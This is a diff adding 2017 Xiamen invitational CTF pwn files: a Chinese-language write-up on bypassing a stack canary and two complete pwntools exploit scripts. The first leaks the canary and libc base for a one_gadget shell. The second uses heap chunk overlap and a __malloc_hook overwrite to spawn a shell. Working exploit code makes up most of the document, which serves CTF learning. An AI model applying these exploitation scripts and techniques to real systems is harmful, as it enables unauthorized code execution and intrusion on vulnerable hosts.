susers
diff --git a/‎2017/厦门邀请赛/Pwn/pwn1/babystack_writeup.md
+113 b/‎2017/厦门邀请赛/Pwn/pwn1/babystack_writeup.md
+113
diff --git a/‎2017/厦门邀请赛/Pwn/pwn1/exp.py
+80 b/‎2017/厦门邀请赛/Pwn/pwn1/exp.py
+80
diff --git a/‎2017/厦门邀请赛/Pwn/pwn2/exp.py
+139 b/‎2017/厦门邀请赛/Pwn/pwn2/exp.py
+139
diff --git a/‎2017/厦门邀请赛/Pwn/pwn2/struct
+8 b/‎2017/厦门邀请赛/Pwn/pwn2/struct
+8
@@ -0,0 +1,113 @@
+#pwn400
+##分析
+![](https://i.imgur.com/A96PIT2.png)  
+这道题主要的障碍就是开启了栈保护，不能随意进行栈溢出，所以我们首先需要绕过金丝雀的限制。  
+
+经过查看，这个程序有两个输入点①输入选项数，②store选项中输入字符串s。  
+这里利用了输出字符串s的过程，将canary泄露出来
+####条件基础：  
+①canary为防止泄露，第一位已知为'\x00'  
+②puts()函数输出时，遇到'\x00'才停止，即使字符串中存在'\n',也会继续输出  
+③read函数在读取长度限制内，能够把'\n'也读进字符串中
+
+##解题思路
+主函数的栈结构如图所示
+ ![](https://i.imgur.com/x1TVvBT.png)  
+所以可以通过将s填充满，使puts(s)时将canary泄露出来。  
+另外一个问题是，虽然程序本身没有开启随机地址，但是其链接库开启了PIE保护，所以我们需要两次溢出：先获得函数地址在libc库中的偏移，进而得到需要函数在内存中的真实地址，然后在溢出执行system函数获取shell。  
+
+##Exp
+    #!/usr/bin/env python
+    # -*- coding: utf-8 -*-
+    __Auther__ = 'M4x'
+    
+    from pwn import * 
+    import sys
+    from time import sleep
+    context.log_level = "debug"
+    # context.terminal = ["deepin-terminal", "-x", "sh", "-c"]
+    
+    def debug():
+        addr = int(raw_input("DEBUG: "), 16)
+        gdb.attach(io, "b *" + str(addr))
+    
+    if sys.argv[1] == "l":
+        io = process("./babystack")
+        elf = ELF("./babystack")
+        libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
+        exe_addr = 0x3f2d6
+    else:
+        io = remote("1c6a6fb.isec.anscen.cn", 1234)
+        elf = ELF("./babystack")
+        libc = ELF("./libc-2.23.so")
+        exe_addr = 0x45216
+    
+    def getCanary():
+        io.sendlineafter(">> ", "1")
+        payload = cyclic(0x88)
+        #  debug()
+        io.sendline(payload)
+        io.sendlineafter(">> ", "2")
+        sleep(1)
+        io.recvuntil("\n")
+        sleep(1)
+        canary = u64("\x00" + io.recv(7))
+        #  print hex(canary)
+        log.debug("leaked canary -> 0x%x" % canary)
+        return canary
+    
+    def getBase(canary):
+        read_got = elf.got["read"]
+        read_plt = elf.plt["read"]
+        puts_plt = elf.plt["puts"]
+        #  start_plt = elf.symbols["start"]
+        #  start_plt = 0x400720
+        start_plt = 0x400908
+        pop_rdi_ret = 0x0000000000400a93
+        pop_rsi_r15_ret = 0x0000000000400a91
+        io.sendlineafter(">> ", "1")
+        #  log.info("------------------")
+        payload = cyclic(0x88) + p64(canary) * 2 + p64(pop_rdi_ret) + p64(read_got) + p64(puts_plt) + p64(start_plt)
+        #  print len(payload)
+        io.sendline(payload)
+        io.sendlineafter(">> ", "3")
+        #  debug()
+        #  log.info("------------------")
+        sleep(1)
+        read_leaked = u64(io.recv(6).ljust(8, '\x00'))
+        log.debug("read_leaked -> 0x%x" % read_leaked)
+        read_libc = libc.symbols["read"]
+        libc_base = read_leaked - read_libc
+        log.debug("leaked libcBase -> 0x%x" % libc_base)
+        return libc_base
+    
+    def getShell(canary, libcBase):
+        io.sendlineafter(">> ", "1")
+        exeAddr = libcBase + exe_addr
+        payload = cyclic(0x88) + p64(canary) * 2 + p64(exeAddr)
+        io.sendline(payload)
+        #  debug()
+        io.sendlineafter(">> ", "3")
+    
+        io.interactive()
+        io.close()
+    
+    if __name__ == "__main__":
+        canary = getCanary()
+        libcBase = getBase(canary)
+        canary = getCanary()
+        getShell(canary, libcBase)
+
+脚本相比之前写过的略长，简单解释一下  
+脚本分为获取canary；获得链接库地址偏移；获取shell三个部分，结构比较清晰。  
+先发送0x88长度的字符串+'\n'，read函数会读进0x89个字节，并将canary第一个字节覆盖，之后puts便能将canary泄露出来。  
+泄露链接库地址基址时，只需将canary的位置使用上一步中泄露出来的canary进行覆盖，获取链接库地址偏移和寄存器利用，详见<a href = "http://www.cnblogs.com/ZHijack/p/7900736.html" target = blank>ret2libc尝试</a>和<a href = "http://www.cnblogs.com/ZHijack/p/7940686.html" target = blank>64位简单栈溢出</a>。最后返回start函数，重新执行。  
+重新执行函数后，需重新泄露canary，然后进行溢出，即可获得shell。
+此处的exeaddr不同于以往ROPgadget找到"/bin/sh"和system函数的地址，是用onegadget直接找到execve("/bin/sh", rsp+0x30, environ)的地址，所以只需跳转到此地址即可获得shell。
+
+![](https://i.imgur.com/2Gj0xZ9.png)
+
+但one_gadget不能保证需要限制寄存器的值,不能保证每次都有效,本题使用one_gadget而不是比较保险的system("/bin/sh")是因为输入长度有限,只能构造很短的ropchain.
+
+除此之外,如果one_gadget失效,还可以试一下另一种方法[stack pivot](https://ctf-wiki.github.io/ctf-wiki/pwn/stackoverflow/others.html#stack-privot)
+
@@ -0,0 +1,80 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+__Auther__ = 'M4x'
+
+from pwn import * 
+import sys
+from time import sleep
+context.log_level = "debug"
+context.terminal = ["deepin-terminal", "-x", "sh", "-c"]
+
+def debug():
+    addr = int(raw_input("DEBUG: "), 16)
+    gdb.attach(io, "b *" + str(addr))
+
+if sys.argv[1] == "l":
+    io = process("./babystack")
+    elf = ELF("./babystack")
+    libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
+    sh_addr = 0x3f2d6
+else:
+    io = remote("1c6a6fb.isec.anscen.cn", 1234)
+    elf = ELF("./babystack")
+    libc = ELF("./libc-2.23.so")
+    sh_addr = 0x45216
+
+def getCanary():
+    io.sendlineafter(">> ", "1")
+    payload = cyclic(0x88)
+    #  debug()
+    io.sendline(payload)
+    io.sendlineafter(">> ", "2")
+    sleep(1)
+    io.recvuntil("\n")
+    sleep(1)
+    canary = u64("\x00" + io.recv(7))
+    #  print hex(canary)
+    log.debug("leaked canary -> 0x%x" % canary)
+    return canary
+
+def getBase(canary):
+    read_got = elf.got["read"]
+    read_plt = elf.plt["read"]
+    puts_plt = elf.plt["puts"]
+    #  start_plt = elf.symbols["start"]
+    #  start_plt = 0x400720
+    start_plt = 0x400908
+    pop_rdi_ret = 0x0000000000400a93
+    pop_rsi_r15_ret = 0x0000000000400a91
+    io.sendlineafter(">> ", "1")
+    #  log.info("------------------")
+    payload = cyclic(0x88) + p64(canary) * 2 + p64(pop_rdi_ret) + p64(read_got) + p64(puts_plt) + p64(start_plt)
+    #  print len(payload)
+    io.sendline(payload)
+    io.sendlineafter(">> ", "3")
+    #  debug()
+    #  log.info("------------------")
+    sleep(1)
+    read_leaked = u64(io.recv(6).ljust(8, '\x00'))
+    log.debug("read_leaked -> 0x%x" % read_leaked)
+    read_libc = libc.symbols["read"]
+    libc_base = read_leaked - read_libc
+    log.debug("leaked libcBase -> 0x%x" % libc_base)
+    return libc_base
+
+def getShell(canary, libcBase):
+    io.sendlineafter(">> ", "1")
+    shAddr = libcBase + sh_addr
+    payload = cyclic(0x88) + p64(canary) * 2 + p64(shAddr)
+    io.sendline(payload)
+    #  debug()
+    io.sendlineafter(">> ", "3")
+
+    io.interactive()
+    io.close()
+
+if __name__ == "__main__":
+    canary = getCanary()
+    libcBase = getBase(canary)
+    canary = getCanary()
+    getShell(canary, libcBase)
@@ -0,0 +1,139 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+__Auther__ = 'M4x'
+
+from pwn import *
+from time import sleep
+import os
+import sys
+context.terminal = ["deepin-terminal", "-x", "sh", "-c"]
+
+elf = ELF("./babyheap")
+if sys.argv[1] == "l":
+    context.log_level = "debug"
+    # env = {'LD_PRELOAD': ''}
+    # io = process("", env = env)
+    io = process("./babyheap")
+    libc = elf.libc
+    main_arena = 0x399b00
+    one_gadget = 0x3f2d6
+    one_gadget = 0x3f32a
+
+else:
+    io = remote("localhost", 9999)
+    libc = ELF("./libc-2.23.so")
+    main_arena = 0x3c4b20
+    one_gadget = 0x4526a
+
+success = lambda name, value: log.success("{} -> {:#x}".format(name, value))
+
+def DEBUG(bps = [], pie = False):
+    if pie:
+        base = int(os.popen("pmap {}| awk '{{print $1}}'".format(pidof(io)[0])).readlines()[1], 16)
+        cmd = ''.join(['b *{:#x}\n'.format(b + base) for b in bps])
+    else:
+        cmd = ''.join(['b *{:#x}\n'.format(b) for b in bps])
+
+    if bps != []:
+        cmd += "c"
+
+    raw_input("DEBUG: ")
+    gdb.attach(io, cmd)
+
+def New(cont):
+    io.sendlineafter(">> ", "1")
+    io.sendline(str(len(cont)))
+    io.send(cont)
+
+def Edit(idx, cont):
+    io.sendlineafter(">> ", "2")
+    io.sendline(str(idx))
+    io.sendline(str(len(cont)))
+    io.send(cont)
+    
+def Print(idx):
+    io.sendlineafter(">> ", "3")
+    io.sendline(str(idx))
+
+def Delete(idx):
+    io.sendlineafter(">> ", "4")
+    io.sendline(str(idx))
+
+if __name__ == "__main__":
+    New('0' * 0x10)
+    New('1' * 0x10)
+    New('2' * 0x100)
+    New('3' * 0x10)
+    Edit(0, '0' * 0x10 + p64(0) + p64(0x21 + 0x110))
+    '''
+    +--------+---------+                        +--------+--------+
+    |prev0   |size0    |                        |prev0   |size0   |
+    +--------+---------+                        +--------+--------+
+    |0000000000000000  |                        |0000000000000000 |
+    +--------+---------+                        +--------+--------+
+    |prev1   |size1    |                        |prev1   |size1+size2|
+    +--------+---------+                        +--------+--------+
+    |1111111111111111  |                        |1111111111111111 |
+    +--------+---------+                        +--------+--------+
+    |prev2   |size2    |                        |prev2   |size2   |
+    +--------+---------+                        +--------+--------+
+    |2222222222222222  |                        |2222222222222222 |
+    |                  |                        |2222222222222222 |
+    |                  |                        |                 |
+    |                  |                        |                 |
+    |                  |                        |                 |
+    |                  |                        |                 |
+    |                  |                        |                 |
+    |                  |                        |                 |
+    |                  |                        |                 |
+    |                  |                        |                 |
+    |                  |                        |                 |
+    |                  |                        |                 |
+    |                  |                        |                 |
+    |                  |                        |                 |
+    |                  |                        |                 |
+    |                  |                        |                 |
+    |                  |                        |                 |
+    |                  |                        |                 |
+    |                  |                        |                 |
+    +--------+---------+                        +--------+--------+
+    |prev3   |size3    |                        |prev3   |size3   |
+    +--------+---------+                        +--------+--------+
+    |3333333333333333  |                        |333333333333333  |
+    +------------------+                        +-----------------+
+    '''
+    Delete(1)
+    #  pause()
+    New('1' * 0x10 + p64(0) + p64(0x111) + '2' * 0x100) # must '2' * 0x100?
+    #  pause()
+    Delete(2)
+    #  DEBUG([0xE63], True)
+    Print(1)
+
+    libc.address = u64(io.recvuntil("\x7f")[-6: ].ljust(8, '\x00')) - 88 - main_arena
+    success("libc.address", libc.address)
+    pause()
+
+    New('a' * 0x60)
+    New('b' * 0x60)
+    New('c' * 0x60)
+    #  DEBUG([0xCFF, 0xEF2], True)
+    Delete(5)
+
+    #  DEBUG([0xDE5], True)
+    Edit(3, 'd' * 0x10 + p64(0) + p64(0x71) + p64(libc.sym['__malloc_hook'] - 0x28 + 5))
+    #  DEBUG([0xCFF], True)
+    New('e' * 0x60)
+    #  DEBUG([0xC73], True)
+    #  DEBUG([0xCFF], True)
+    #  New('00000000111111112222222233333333444444445555555566666666'.ljust(0x60, '0'))
+    payload = p8(0) * 19 + p64(libc.address + one_gadget)
+    New(payload.ljust(0x60, '0'))
+
+
+    #  DEBUG([0xC73], True)
+    New('getshell')
+
+    io.interactive()
+    io.close()
+
@@ -0,0 +1,8 @@
+struct HEAP
+{
+	int inuse;
+	int size;
+	char *cont;
+}
+
+struct HEAP blocks[64];